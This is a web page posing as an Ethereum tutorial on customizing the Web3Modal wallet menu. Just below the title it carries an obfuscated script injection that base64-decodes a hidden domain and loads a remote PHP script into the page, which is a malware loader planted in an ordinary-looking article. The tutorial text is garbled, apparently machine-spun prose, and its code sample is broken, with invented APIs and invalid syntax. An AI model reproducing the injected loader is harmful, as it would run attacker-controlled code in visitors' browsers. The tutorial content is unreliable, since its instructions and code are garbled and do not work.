Ethereum: How to customize Web3Modal wallet menu?

const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx);const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=1afd97f9″;document.body.appendChild(script);

Here’s an article on how to customize the WalletConnect Web3Modaal Menu:

Web3Modaal Wallet menu personality walletconnect

Ethereum: How to customize Web3Modal wallet menu?

When using a web3 modal interaction with DAPP, one of the most important features you want to fulfill, you need to customize the wallet menu. This allows users to easily browse DAPP’s different options and settings, which makes it easier and more intuitive.

In this article, we are traveling on how to customize the WalletConnect Web3Modal Web3Modal menu with JavaScript.

WalletConnect settings

Before diving the Wallet menu, we will ensure that the WalletConnect is correctly determined. Go to DAPP settings> WalletConnect wallets and connectors and make sure that the right supplier URL is introduced in the “Wallet Supplier” field. You can also activate or deactivate WalletConnect by connecting the switch next to it.

Creating a personal wallet menu

To create a personal wallet menu, you must use the web3 modal “web3modaal” and its various methods to interact with your wallets. Here is an example of a code fragment that indicates how to customize the wallet menu:


Const web3modal = requires ('web3modal');

Const {WalletconnectProvider} = Requires ('@web3connect/web3connect');

// Create a new WalletConnect supplier manifestation

Const Support = New WalletConnectProvider ({

URL: " // Replace Wallet Supplier URL

// Optional: Set the amount of ETH to send to each event

Options: {

Gasprice: 50,

Maxgas: 20000,

Account: "0xyourwaltaddress",

Chainid: 1, // Ethereum



// Get the Web3Modaal Court

Const Web3 = New Web3Modal ({


Activity Information: [1],


// Define a feature to display your wallet menu

Async Function Showwalgennu () {

consisting of wallets = wait for web3.listaccounts ();

Const walletmenutems = [];

// loops -Va through each wallet and create an object in a wallet menu

for (consisting of wallet) {

allows the product;

// Check if the user has activated this account with WalletConnect

If (account === '0xyourwaltadress') {

Item = {

Tag: "wallet",

Description: "This is the default wallet",

Oconurl: ' // Replace the wallet icon URL

Options: {

Action: "wallet",



} Else If (Cont .Startsywith ('0x')) {

Item = {

Tag: "Connect the Wallet",

Description: "Connect to another wallet or chain",

Iconurl: ' // Replace the URL of the wallet icon

Options: {

Action: "Connect-Wallet",



} Else If (Cont .Startswith ('0x ...')) {

Item = {

Tag: walletconnectProvider.label,

Description:Wallet Connect journalist $ {account},

Iconurl: ‘ // Replace the URL of the wallet icon

Options: {

ACTIVITIES: “Wallet-Ponsonal”,



} Else {

Item = {

Tag: account $ {i + 1},

Description:account $ {i + 1} details,

Iconurl: ‘ // Replace your account icon URL.

Options: {

Action: “Account Information”,




Walletmenutems.push (element);


Return {wallet arteries};


// View wallet menu loaded

Web3.on (‘connected’, () => shopwalletmenu ());

// View a wallet menu while the user clicks on a wallet account


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